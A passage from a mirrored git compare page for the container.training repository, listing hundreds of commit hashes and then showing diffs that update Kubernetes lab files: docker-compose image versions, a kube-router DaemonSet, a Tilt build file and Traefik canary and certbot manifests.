mirror of
https://github.com/jpetazzo/container.training.git
synced 2026-02-19 20:19:54 +00:00
Compare commits
750 Commits
intro-2019
...
2021-09-zo
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
ca5d1d0330 | ||
|
|
c5cd84e274 | ||
|
|
108f936f84 | ||
|
|
3594fef67a | ||
|
|
021929e50e | ||
|
|
e3fa685ee1 | ||
|
|
4f662d14cc | ||
|
|
d956da1733 | ||
|
|
1b820f3bc1 | ||
|
|
f1d4704b0e | ||
|
|
71423233bd | ||
|
|
b508360227 | ||
|
|
7cd47243ab | ||
|
|
a9d84b01d8 | ||
|
|
4df547d9b1 | ||
|
|
d14f86e683 | ||
|
|
92cdb4146b | ||
|
|
0ca798bc30 | ||
|
|
8025d37188 | ||
|
|
3318ce84e4 | ||
|
|
3e29881ece | ||
|
|
b91ed846a0 | ||
|
|
f123878c85 | ||
|
|
2c048a0193 | ||
|
|
ee7bd37f83 | ||
|
|
166cacc48e | ||
|
|
9595179f03 | ||
|
|
3b6509b95b | ||
|
|
c84a5ce6b7 | ||
|
|
4402c17eb9 | ||
|
|
4f04046fea | ||
|
|
6a6882802d | ||
|
|
75f33bb9d8 | ||
|
|
ab266aba83 | ||
|
|
e26eeb4386 | ||
|
|
98429e14f0 | ||
|
|
bbf65f7433 | ||
|
|
cb6f3989fd | ||
|
|
dbc87e7a0d | ||
|
|
08d7b93be1 | ||
|
|
b66b8d25af | ||
|
|
f780e4a0e6 | ||
|
|
a129187ce1 | ||
|
|
ac0547d96b | ||
|
|
58ccebf5c7 | ||
|
|
56b9b864bb | ||
|
|
f49a8f2ec9 | ||
|
|
ea031a6231 | ||
|
|
c92e887c53 | ||
|
|
a6992e0c09 | ||
|
|
07818688a7 | ||
|
|
c624415e78 | ||
|
|
112f6ec3b7 | ||
|
|
f51b5c7244 | ||
|
|
88a5041943 | ||
|
|
8d7f8c9c05 | ||
|
|
19fc53dbbd | ||
|
|
d74a331a05 | ||
|
|
53a3c8a86a | ||
|
|
2214717aaa | ||
|
|
e75e4d7f2c | ||
|
|
84c33b9eae | ||
|
|
e606cd2b21 | ||
|
|
d217e52ab5 | ||
|
|
f3c3646298 | ||
|
|
f25bf60d46 | ||
|
|
6ab11ca91c | ||
|
|
a5d857edd4 | ||
|
|
25d6073b17 | ||
|
|
216fefad23 | ||
|
|
f3eb9ce12f | ||
|
|
a484425c81 | ||
|
|
67806fc592 | ||
|
|
cfcf874bac | ||
|
|
858afc846c | ||
|
|
629b4d1037 | ||
|
|
58f2894b54 | ||
|
|
df1db67e53 | ||
|
|
068c81bdcd | ||
|
|
911d78aede | ||
|
|
305674fa3c | ||
|
|
6bdc687cc7 | ||
|
|
49e3a0b75f | ||
|
|
5acb05dfff | ||
|
|
edaef92b35 | ||
|
|
63fccb495f | ||
|
|
055c8a7267 | ||
|
|
f72847bc81 | ||
|
|
4be82f4f57 | ||
|
|
cb760dbe94 | ||
|
|
f306749f68 | ||
|
|
8d20fa4654 | ||
|
|
249d446ef2 | ||
|
|
fe84dec863 | ||
|
|
ce8dc2cdff | ||
|
|
bc33f1f5df | ||
|
|
8597ca1956 | ||
|
|
2300d0719b | ||
|
|
2e6230a9a0 | ||
|
|
ae17c2479c | ||
|
|
23f7e8cff9 | ||
|
|
f72cf16c82 | ||
|
|
6ec8849da1 | ||
|
|
6c11de207a | ||
|
|
2295e4f3de | ||
|
|
18853b2497 | ||
|
|
426957bdca | ||
|
|
6bc08c0a7e | ||
|
|
88d4e5ff54 | ||
|
|
e3e4d04202 | ||
|
|
be6d982e2c | ||
|
|
04bc8a9f60 | ||
|
|
b0dc1c7c3f | ||
|
|
bb1b225026 | ||
|
|
2160aa7f40 | ||
|
|
8f75a4cd7f | ||
|
|
45213a8f2e | ||
|
|
f03aedd024 | ||
|
|
fcfcb127b4 | ||
|
|
5380b2d52a | ||
|
|
cc5da860b9 | ||
|
|
9e9b17f6c9 | ||
|
|
b9ea938157 | ||
|
|
b23aacdce0 | ||
|
|
c3d6e5e660 | ||
|
|
907adf8075 | ||
|
|
dff505ac76 | ||
|
|
df0ffc4d75 | ||
|
|
02278b3748 | ||
|
|
ab959220ba | ||
|
|
b4576e39d0 | ||
|
|
894dafeecb | ||
|
|
366c656d82 | ||
|
|
a60f929232 | ||
|
|
fdc58cafda | ||
|
|
8de186b909 | ||
|
|
b816d075d4 | ||
|
|
6303b67b86 | ||
|
|
4f3bb9beb2 | ||
|
|
1f34da55b3 | ||
|
|
f30792027f | ||
|
|
74679ab77e | ||
|
|
71ce2eb31a | ||
|
|
eb96dd21bb | ||
|
|
b1adca025d | ||
|
|
e82d2812aa | ||
|
|
9c8c3ef537 | ||
|
|
2f2948142a | ||
|
|
2516b2d32b | ||
|
|
42f4b65c87 | ||
|
|
989a62b5ff | ||
|
|
b5eb59ab80 | ||
|
|
10920509c3 | ||
|
|
955149e019 | ||
|
|
111ff30c38 | ||
|
|
6c038a5d33 | ||
|
|
6737a20840 | ||
|
|
1d1060a319 | ||
|
|
93e9a60634 | ||
|
|
de2c0e72c3 | ||
|
|
41204c948b | ||
|
|
553b1f7871 | ||
|
|
bd168f7676 | ||
|
|
3a527649d1 | ||
|
|
ecbbcf8b51 | ||
|
|
29edb1aefe | ||
|
|
bd3c91f342 | ||
|
|
fa709f0cb4 | ||
|
|
543b44fb29 | ||
|
|
536a9cc44b | ||
|
|
2ff3d88bab | ||
|
|
295ee9b6b4 | ||
|
|
17c5f6de01 | ||
|
|
556dbb965c | ||
|
|
32250f8053 | ||
|
|
bdede6de07 | ||
|
|
eefdc21488 | ||
|
|
e145428910 | ||
|
|
76789b6113 | ||
|
|
f9660ba9dc | ||
|
|
c2497508f8 | ||
|
|
b5d3b213b1 | ||
|
|
b4c76ad11d | ||
|
|
b251ff3812 | ||
|
|
ede4ea0dd5 | ||
|
|
2ab06c6dfd | ||
|
|
3a01deb039 | ||
|
|
b88f63e1f7 | ||
|
|
918311ac51 | ||
|
|
73e8110f09 | ||
|
|
ecb5106d59 | ||
|
|
e4d8cd4952 | ||
|
|
c4aedbd327 | ||
|
|
2fb3584b1b | ||
|
|
cb90cc9a1e | ||
|
|
bf28dff816 | ||
|
|
b5cb871c69 | ||
|
|
aa8f538574 | ||
|
|
ebf2e23785 | ||
|
|
0553a1ba8b | ||
|
|
9d47177028 | ||
|
|
9d4a035497 | ||
|
|
6fe74cb35c | ||
|
|
43aa41ed51 | ||
|
|
f6e810f648 | ||
|
|
4c710d6826 | ||
|
|
410c98399e | ||
|
|
19c9843a81 | ||
|
|
69d084e04a | ||
|
|
1300d76890 | ||
|
|
0040313371 | ||
|
|
c9e04b906d | ||
|
|
41f66f4144 | ||
|
|
aced587fd0 | ||
|
|
749b3d1648 | ||
|
|
c40cc71bbc | ||
|
|
69b775ef27 | ||
|
|
3bfc14c5f7 | ||
|
|
97984af8a2 | ||
|
|
9b31c45899 | ||
|
|
c0db28d439 | ||
|
|
0e49bfa837 | ||
|
|
fc9c0a6285 | ||
|
|
d4914fa168 | ||
|
|
e4edd9445c | ||
|
|
ba7deefce5 | ||
|
|
be104f1b44 | ||
|
|
5c329b0b79 | ||
|
|
78ffd22499 | ||
|
|
33174a1682 | ||
|
|
d402a2ea93 | ||
|
|
1fc3abcffd | ||
|
|
c1020f24b1 | ||
|
|
4fc81209d4 | ||
|
|
ed841711c5 | ||
|
|
07457af6f7 | ||
|
|
2d4961fbd3 | ||
|
|
14679999be | ||
|
|
29c6d2876a | ||
|
|
a02e7429ad | ||
|
|
fee0be7f09 | ||
|
|
d98fcbce87 | ||
|
|
35320837e5 | ||
|
|
d73e597198 | ||
|
|
b4c0378114 | ||
|
|
efdc4fcfa9 | ||
|
|
c32fcc81bb | ||
|
|
f6930042bd | ||
|
|
2e2767b090 | ||
|
|
115cc5e0c0 | ||
|
|
d252fe254b | ||
|
|
7d96562042 | ||
|
|
4ded8c699d | ||
|
|
620a3df798 | ||
|
|
d28723f07a | ||
|
|
f2334d2d1b | ||
|
|
ddf79eebc7 | ||
|
|
6467264ff5 | ||
|
|
55fcff9333 | ||
|
|
8fb7ea3908 | ||
|
|
7dd72f123f | ||
|
|
ff95066006 | ||
|
|
8146c4dabe | ||
|
|
17aea33beb | ||
|
|
9770f81a1c | ||
|
|
0cb9095303 | ||
|
|
ffded8469b | ||
|
|
0e892cf8b4 | ||
|
|
b87efbd6e9 | ||
|
|
1a24b530d6 | ||
|
|
122ffec5c2 | ||
|
|
276a2dbdda | ||
|
|
2836b58078 | ||
|
|
0d065788a4 | ||
|
|
14271a4df0 | ||
|
|
412d029d0c | ||
|
|
f960230f8e | ||
|
|
774c8a0e31 | ||
|
|
4671a981a7 | ||
|
|
b9743a5f8c | ||
|
|
df4980750c | ||
|
|
9467c7309e | ||
|
|
86b0380a77 | ||
|
|
eb9052ae9a | ||
|
|
8f85332d8a | ||
|
|
0479ad2285 | ||
|
|
986d7eb9c2 | ||
|
|
3fafbb8d4e | ||
|
|
5a24df3fd4 | ||
|
|
1bbfba0531 | ||
|
|
8d98431ba0 | ||
|
|
c31c81a286 | ||
|
|
a0314fc5f5 | ||
|
|
3f088236a4 | ||
|
|
ce4e2ffe46 | ||
|
|
c3a05a6393 | ||
|
|
40b2b8e62e | ||
|
|
efdcf4905d | ||
|
|
bdb57c05b4 | ||
|
|
af0762a0a2 | ||
|
|
0d6c364a95 | ||
|
|
690a1eb75c | ||
|
|
c796a6bfc1 | ||
|
|
0b10d3d40d | ||
|
|
cdb50925da | ||
|
|
ca1f8ec828 | ||
|
|
7302d3533f | ||
|
|
d3c931e602 | ||
|
|
7402c8e6a8 | ||
|
|
1de539bff8 | ||
|
|
a6c7d69986 | ||
|
|
b0bff595cf | ||
|
|
6f806ed200 | ||
|
|
0c8b20f6b6 | ||
|
|
2ba35e1f8d | ||
|
|
eb0d9bed2a | ||
|
|
bab493a926 | ||
|
|
f4f2d83fa4 | ||
|
|
9f049951ab | ||
|
|
7257a5c594 | ||
|
|
102aef5ac5 | ||
|
|
d2b3a1d663 | ||
|
|
d84ada0927 | ||
|
|
0e04b4a07d | ||
|
|
aef910b4b7 | ||
|
|
298b6db20c | ||
|
|
7ec6e871c9 | ||
|
|
a0558e4ee5 | ||
|
|
16a62f9f84 | ||
|
|
454843b755 | ||
|
|
63e68ab720 | ||
|
|
46f0bc0dfb | ||
|
|
16bb3f1847 | ||
|
|
fef3fa31fb | ||
|
|
b844e40372 | ||
|
|
5b5d5946e8 | ||
|
|
af6705fb1e | ||
|
|
bfd63c16c6 | ||
|
|
2ce50007d2 | ||
|
|
c506038682 | ||
|
|
7d8fdd43bd | ||
|
|
adf0f53aab | ||
|
|
49fe1b8e17 | ||
|
|
073a5f8c84 | ||
|
|
032803806d | ||
|
|
f7b327a33a | ||
|
|
d3526aac00 | ||
|
|
3736dd6e86 | ||
|
|
c03f199023 | ||
|
|
8ba9c2e41b | ||
|
|
36d1199b70 | ||
|
|
56e09eef6d | ||
|
|
15f71506b6 | ||
|
|
5eb8453597 | ||
|
|
65ee4e3885 | ||
|
|
ac801746eb | ||
|
|
0af16b98c9 | ||
|
|
2fde58a3ee | ||
|
|
38fec0b00d | ||
|
|
627800ddd5 | ||
|
|
871aab23ad | ||
|
|
8d7fa29a79 | ||
|
|
22f09c37a3 | ||
|
|
eacffe3cc5 | ||
|
|
d044f2bbd0 | ||
|
|
a3da2615ff | ||
|
|
9a1ea0f1bd | ||
|
|
67ac03e76e | ||
|
|
38725cf3da | ||
|
|
3e98148e3f | ||
|
|
b988c28b41 | ||
|
|
583933c492 | ||
|
|
ebadc1ca59 | ||
|
|
7f85c645f0 | ||
|
|
ed5009c769 | ||
|
|
e2f3034a96 | ||
|
|
8933e6aa1b | ||
|
|
784b2a3e4e | ||
|
|
f3bbd6377b | ||
|
|
04d3a7b360 | ||
|
|
a32df01165 | ||
|
|
ba323cb4e6 | ||
|
|
745a435a1a | ||
|
|
db276af182 | ||
|
|
87462939d9 | ||
|
|
7d6ab6974d | ||
|
|
ae606b9c40 | ||
|
|
da9921d68a | ||
|
|
3e9a939578 | ||
|
|
328a2edaaf | ||
|
|
1f826d7993 | ||
|
|
cff9cbdfbb | ||
|
|
3ea6b730c8 | ||
|
|
1c6c76162f | ||
|
|
52bafdb57e | ||
|
|
c4d9e6b3e1 | ||
|
|
5160dd39a0 | ||
|
|
3c1220be83 | ||
|
|
6a814cf039 | ||
|
|
1385a1bae2 | ||
|
|
68a6546276 | ||
|
|
8a2ca450ee | ||
|
|
6e8ac173e0 | ||
|
|
97e68ae185 | ||
|
|
148ddd5174 | ||
|
|
e8eb11e257 | ||
|
|
fe9b56572e | ||
|
|
7281ca3ca0 | ||
|
|
34a17aa097 | ||
|
|
b37dd85eff | ||
|
|
4811420d55 | ||
|
|
a824afec85 | ||
|
|
89d9fcb1c4 | ||
|
|
5b488fbe62 | ||
|
|
6d01a9d813 | ||
|
|
cb81469170 | ||
|
|
c595a337e4 | ||
|
|
03d2d0bc5d | ||
|
|
2c46106792 | ||
|
|
291d2a6c92 | ||
|
|
f73fb92832 | ||
|
|
e9e2fa0e50 | ||
|
|
a0162d37f1 | ||
|
|
a61b69ad9a | ||
|
|
3388db4272 | ||
|
|
d2d901302f | ||
|
|
1fae4253bc | ||
|
|
f7f5ab1304 | ||
|
|
7addacef22 | ||
|
|
0136391ab5 | ||
|
|
ed27ad1d1e | ||
|
|
c15aa708df | ||
|
|
5749348883 | ||
|
|
bc885f3dca | ||
|
|
bbe35a3901 | ||
|
|
eb17b4c628 | ||
|
|
a4d50a5439 | ||
|
|
98d2b79c97 | ||
|
|
8320534a5c | ||
|
|
74ece65947 | ||
|
|
7444f8d71e | ||
|
|
c9bc417a32 | ||
|
|
7d4331477a | ||
|
|
ff132fd728 | ||
|
|
4ec7b1d7f4 | ||
|
|
e08e7848ed | ||
|
|
be6afa3e5e | ||
|
|
c340d909de | ||
|
|
b667cf7cfc | ||
|
|
e04998e9cd | ||
|
|
84198b3fdc | ||
|
|
5c161d2090 | ||
|
|
0fc7c2316c | ||
|
|
fb64c0d68f | ||
|
|
23aaf7f58c | ||
|
|
6cbcc4ae69 | ||
|
|
0b80238736 | ||
|
|
4c285b5318 | ||
|
|
2095a15728 | ||
|
|
13ba8cef9d | ||
|
|
be2374c672 | ||
|
|
f96da2d260 | ||
|
|
5958874071 | ||
|
|
370bdf9aaf | ||
|
|
381cd27037 | ||
|
|
c409c6997a | ||
|
|
eb2e74f236 | ||
|
|
169d850fc7 | ||
|
|
96104193ba | ||
|
|
5a5a08cf25 | ||
|
|
82b7b7ba88 | ||
|
|
8c4a0a3fce | ||
|
|
f4f0fb0f23 | ||
|
|
8dfcb440c8 | ||
|
|
f3622d98fe | ||
|
|
b1fc7580a1 | ||
|
|
ab77d89232 | ||
|
|
04f728c67a | ||
|
|
5bbce4783a | ||
|
|
889c79addb | ||
|
|
c4b408621c | ||
|
|
49df28d44f | ||
|
|
46878ed6c7 | ||
|
|
b5b005b6d2 | ||
|
|
9e991d1900 | ||
|
|
ace911a208 | ||
|
|
ead027a62e | ||
|
|
09c832031b | ||
|
|
34fca341bc | ||
|
|
af18c5ab9f | ||
|
|
afa3a59461 | ||
|
|
1abfac419b | ||
|
|
edd2f749c0 | ||
|
|
2365b8f460 | ||
|
|
c7a504dcb4 | ||
|
|
ffb15c8316 | ||
|
|
f7fbe1b056 | ||
|
|
4be1b40586 | ||
|
|
91fb2f167c | ||
|
|
02dcb58f77 | ||
|
|
3a816568da | ||
|
|
9a184c6d44 | ||
|
|
ba4ec23767 | ||
|
|
c690a02d37 | ||
|
|
6bbf8a123c | ||
|
|
cede1a4c12 | ||
|
|
e24a1755ec | ||
|
|
44e84c5f23 | ||
|
|
947ab97b14 | ||
|
|
45ea521acd | ||
|
|
99d2e99cea | ||
|
|
0d4b7d6c7e | ||
|
|
45ac1768a3 | ||
|
|
f0d991cd02 | ||
|
|
4e1950821d | ||
|
|
2668a73fb0 | ||
|
|
2d56d9f57c | ||
|
|
b27f960483 | ||
|
|
50211dcc6e | ||
|
|
35654762b3 | ||
|
|
a77fe701b7 | ||
|
|
dee48d950e | ||
|
|
645d424a54 | ||
|
|
875c552029 | ||
|
|
c2eb0de99a | ||
|
|
9efe1f3129 | ||
|
|
14b7670c7d | ||
|
|
f20e0b1435 | ||
|
|
26317315b5 | ||
|
|
5bf39669e3 | ||
|
|
c06b680fed | ||
|
|
ba34183774 | ||
|
|
abda9431ae | ||
|
|
581635044b | ||
|
|
b041a2f9ec | ||
|
|
7fd8b7db2d | ||
|
|
dcd91c46b7 | ||
|
|
076a68379d | ||
|
|
741faed32e | ||
|
|
9a9f7a3c72 | ||
|
|
a458c41068 | ||
|
|
ce6cdae80c | ||
|
|
73f0d61759 | ||
|
|
0ae7d38b68 | ||
|
|
093e3ab5ab | ||
|
|
be72fbe80a | ||
|
|
560328327c | ||
|
|
9f1d2581fc | ||
|
|
ab1a360cdc | ||
|
|
860907ccf0 | ||
|
|
ad4c86b3f4 | ||
|
|
8f7ca0d261 | ||
|
|
626e4a8e35 | ||
|
|
b21f61ad27 | ||
|
|
bac0d9febd | ||
|
|
313df8f9ff | ||
|
|
ef6a5f05f8 | ||
|
|
d71a636a9d | ||
|
|
990a873e81 | ||
|
|
98836d85cf | ||
|
|
c959a4c4a1 | ||
|
|
c3a796faef | ||
|
|
56cc65daf2 | ||
|
|
a541e53c78 | ||
|
|
7a63dfb0cf | ||
|
|
093cfd1c24 | ||
|
|
8492524798 | ||
|
|
12b625d4f6 | ||
|
|
a78e99d97e | ||
|
|
161b8aed7d | ||
|
|
4f1252d0b6 | ||
|
|
1b407cbc5e | ||
|
|
dd6f3c9eee | ||
|
|
d4afae54b8 | ||
|
|
730ef0f421 | ||
|
|
c1f9082fdc | ||
|
|
1fcb223a1d | ||
|
|
5e520dfbe5 | ||
|
|
91d3f025b0 | ||
|
|
79b8e5f2f0 | ||
|
|
f809faadb9 | ||
|
|
4e225fdaf5 | ||
|
|
36be4eaa9f | ||
|
|
57aa25fda0 | ||
|
|
42ed6fc56a | ||
|
|
5aedee5564 | ||
|
|
0a2879e1a5 | ||
|
|
3e87e69608 | ||
|
|
b572d06f82 | ||
|
|
2c0b4b15ba | ||
|
|
f91e995e90 | ||
|
|
59c2ff1911 | ||
|
|
879e7f2ec9 | ||
|
|
ad4cc074c1 | ||
|
|
ab8b478648 | ||
|
|
68f35bd2ed | ||
|
|
964b92d320 | ||
|
|
db961b486f | ||
|
|
a90dcf1d9a | ||
|
|
f4ef2bd6d4 | ||
|
|
baf428ebdb | ||
|
|
3a87183a66 | ||
|
|
3f70ee2c2a | ||
|
|
68a26ae501 | ||
|
|
2ef72a4dd8 | ||
|
|
f4e16dccc4 | ||
|
|
4c55336079 | ||
|
|
b22d3e3d21 | ||
|
|
7b8370dc12 | ||
|
|
db6d2c8188 | ||
|
|
eb02875bd0 | ||
|
|
4ba954cae4 | ||
|
|
84b691a89d | ||
|
|
c1e9073781 | ||
|
|
6593f4ad42 | ||
|
|
bde7f75881 | ||
|
|
25c820c87a | ||
|
|
39027675d5 | ||
|
|
f8e0de3519 | ||
|
|
3a512779b2 | ||
|
|
d987f21cba | ||
|
|
1f08425437 | ||
|
|
f69c9853bb | ||
|
|
c565dad43c | ||
|
|
e48c23e4f4 | ||
|
|
eb04aacb5e | ||
|
|
b0f01e018c | ||
|
|
9504f81526 | ||
|
|
12ef2eb66e | ||
|
|
e4311a3037 | ||
|
|
7309304ced | ||
|
|
26c876174a | ||
|
|
9775954b42 | ||
|
|
d4500eff5a | ||
|
|
0ba6adb027 | ||
|
|
d3af9ff333 | ||
|
|
c9dc6fa7cb | ||
|
|
485704a169 | ||
|
|
72fa8c366b | ||
|
|
8ea4b23530 | ||
|
|
785a8178ca | ||
|
|
0dfff26410 | ||
|
|
5b4debfd81 | ||
|
|
69f9cee6c9 | ||
|
|
4c44f3e690 | ||
|
|
b69119eed4 | ||
|
|
940694a2b0 | ||
|
|
c3de1049f1 | ||
|
|
116515d19b | ||
|
|
098671ec20 | ||
|
|
51e77cb62c | ||
|
|
e2044fc2b2 | ||
|
|
f795d67f02 | ||
|
|
6f6dc66818 | ||
|
|
0ae39339b9 | ||
|
|
e6b73a98f4 | ||
|
|
03657ea896 | ||
|
|
4106059d4a | ||
|
|
2c0ed6ea2a | ||
|
|
3557a546e1 | ||
|
|
d3dd5503cf | ||
|
|
82f8f41639 | ||
|
|
dff8c1e43a | ||
|
|
9deeddc83a | ||
|
|
dc7c1e95ca | ||
|
|
a4babd1a77 | ||
|
|
609756b4f3 | ||
|
|
c367ad1156 | ||
|
|
06aba6737a | ||
|
|
b9c08613ed | ||
|
|
da2264d1ca | ||
|
|
66fbd7ee9e | ||
|
|
a78bb4b2bf | ||
|
|
9dbd995c85 | ||
|
|
b535d43b02 | ||
|
|
a77aabcf95 | ||
|
|
b42e4e6f80 | ||
|
|
1af958488e | ||
|
|
2fe4644225 | ||
|
|
3d001b0585 | ||
|
|
e42d9be1ce | ||
|
|
d794c8df42 | ||
|
|
85144c4f55 | ||
|
|
fba198d4d7 | ||
|
|
da8b4fb972 | ||
|
|
74c9286087 | ||
|
|
d4c3686a2a | ||
|
|
9a66481cfd | ||
|
|
f5d523d3c8 | ||
|
|
9296b375f3 | ||
|
|
6d761b4dcc | ||
|
|
fada4e8ae7 | ||
|
|
dbcb4371d4 | ||
|
|
3f40cc25a2 | ||
|
|
aa55a5b870 | ||
|
|
f272df9aae | ||
|
|
b92da2cf9f | ||
|
|
fea69f62d6 | ||
|
|
627c3361a1 | ||
|
|
603baa0966 | ||
|
|
dd5a66704c | ||
|
|
95b05d8a23 | ||
|
|
c761ce9436 | ||
|
|
020cfeb0ad | ||
|
|
4c89d48a0b | ||
|
|
e2528191cd | ||
|
|
50710539af | ||
|
|
0e7c05757f | ||
|
|
6b21fa382a | ||
|
|
1ff3b52878 | ||
|
|
307fd18f2c | ||
|
|
ad81ae0109 | ||
|
|
11c8ded632 | ||
|
|
5413126534 | ||
|
|
ddcb02b759 | ||
|
|
ff111a2610 | ||
|
|
5a4adb700a | ||
|
|
1e77f57434 | ||
|
|
2dc634e1f5 | ||
|
|
df185c88a5 | ||
|
|
f40b8a1bfa | ||
|
|
ded5fbdcd4 | ||
|
|
038563b5ea | ||
|
|
d929f5f84c | ||
|
|
cd1dafd9e5 | ||
|
|
945586d975 | ||
|
|
aa6b74efcb | ||
|
|
4784a41a37 | ||
|
|
0d551f682e | ||
|
|
9cc422f782 | ||
|
|
287f6e1cdf | ||
|
|
2d3ddc570e | ||
|
|
82c26c2f19 | ||
|
|
6636f92cf5 | ||
|
|
ff4219ab5d | ||
|
|
71cfade398 | ||
|
|
c44449399a | ||
|
|
637c46e372 | ||
|
|
2b2d7c5544 | ||
|
|
84c233a954 | ||
|
|
0019b22f1d | ||
|
|
a4b23e3f02 | ||
|
|
d5fd297c2d | ||
|
|
3ad1e89620 | ||
|
|
d1609f0725 | ||
|
|
ef70ed8006 | ||
|
|
5f75f04c97 | ||
|
|
4d475334b5 | ||
|
|
59f2416c56 | ||
|
|
ea3e19c5c5 |
2
.gitignore
vendored
2
.gitignore
vendored
@@ -3,10 +3,12 @@
|
||||
*~
|
||||
prepare-vms/tags
|
||||
prepare-vms/infra
|
||||
prepare-vms/www
|
||||
slides/*.yml.html
|
||||
slides/autopilot/state.yaml
|
||||
slides/index.html
|
||||
slides/past.html
|
||||
slides/slides.zip
|
||||
node_modules
|
||||
|
||||
### macOS ###
|
||||
|
||||
@@ -39,7 +39,7 @@ your own tutorials.
|
||||
All these materials have been gathered in a single repository
|
||||
because they have a few things in common:
|
||||
|
||||
- some [common slides](slides/common/) that are re-used
|
||||
- some [shared slides](slides/shared/) that are re-used
|
||||
(and updated) identically between different decks;
|
||||
- a [build system](slides/) generating HTML slides from
|
||||
Markdown source files;
|
||||
|
||||
@@ -9,21 +9,21 @@ services:
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.3.10
|
||||
image: k8s.gcr.io/etcd:3.4.9
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
image: k8s.gcr.io/hyperkube:v1.18.8
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
image: k8s.gcr.io/hyperkube:v1.18.8
|
||||
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
|
||||
"Edit the CLUSTER placeholder first. Then, remove this line.":
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
image: k8s.gcr.io/hyperkube:v1.18.8
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
|
||||
@@ -12,7 +12,6 @@ metadata:
|
||||
name: kube-router-cfg
|
||||
namespace: kube-system
|
||||
labels:
|
||||
tier: node
|
||||
k8s-app: kube-router
|
||||
data:
|
||||
cni-conf.json: |
|
||||
@@ -32,20 +31,21 @@ data:
|
||||
]
|
||||
}
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
tier: node
|
||||
name: kube-router
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kube-router
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
tier: node
|
||||
annotations:
|
||||
scheduler.alpha.kubernetes.io/critical-pod: ''
|
||||
spec:
|
||||
|
||||
@@ -1,3 +1,6 @@
|
||||
# Note: hyperkube isn't available after Kubernetes 1.18.
|
||||
# So we'll have to update this for Kubernetes 1.19!
|
||||
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
@@ -9,20 +12,20 @@ services:
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.3.10
|
||||
image: k8s.gcr.io/etcd:3.4.9
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
image: k8s.gcr.io/hyperkube:v1.18.8
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
image: k8s.gcr.io/hyperkube:v1.18.8
|
||||
command: kube-controller-manager --master http://localhost:8080
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
image: k8s.gcr.io/hyperkube:v1.18.8
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
|
||||
49
dockercoins/Tiltfile
Normal file
49
dockercoins/Tiltfile
Normal file
@@ -0,0 +1,49 @@
|
||||
k8s_yaml(blob('''
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: registry
|
||||
name: registry
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: registry
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: registry
|
||||
spec:
|
||||
containers:
|
||||
- image: registry
|
||||
name: registry
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: registry
|
||||
name: registry
|
||||
spec:
|
||||
ports:
|
||||
- port: 5000
|
||||
protocol: TCP
|
||||
targetPort: 5000
|
||||
nodePort: 30555
|
||||
selector:
|
||||
app: registry
|
||||
type: NodePort
|
||||
'''))
|
||||
default_registry('localhost:30555')
|
||||
docker_build('dockercoins/hasher', 'hasher')
|
||||
docker_build('dockercoins/rng', 'rng')
|
||||
docker_build('dockercoins/webui', 'webui')
|
||||
docker_build('dockercoins/worker', 'worker')
|
||||
k8s_yaml('../k8s/dockercoins.yaml')
|
||||
|
||||
# Uncomment the following line to let tilt run with the default kubeadm cluster-admin context.
|
||||
#allow_k8s_contexts('kubernetes-admin@kubernetes')
|
||||
|
||||
# While we're here: if you're controlling a remote cluster, uncomment that line.
|
||||
# It will create a port forward so that you can access the remote registry.
|
||||
#k8s_resource(workload='registry', port_forwards='30555:5000')
|
||||
21
k8s/canary.yaml
Normal file
21
k8s/canary.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
annotations:
|
||||
traefik.ingress.kubernetes.io/service-weights: |
|
||||
whatever: 90%
|
||||
whatever-new: 10%
|
||||
spec:
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 80
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever-new
|
||||
servicePort: 80
|
||||
33
k8s/certbot.yaml
Normal file
33
k8s/certbot.yaml
Normal file
@@ -0,0 +1,33 @@
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: certbot
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
---
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
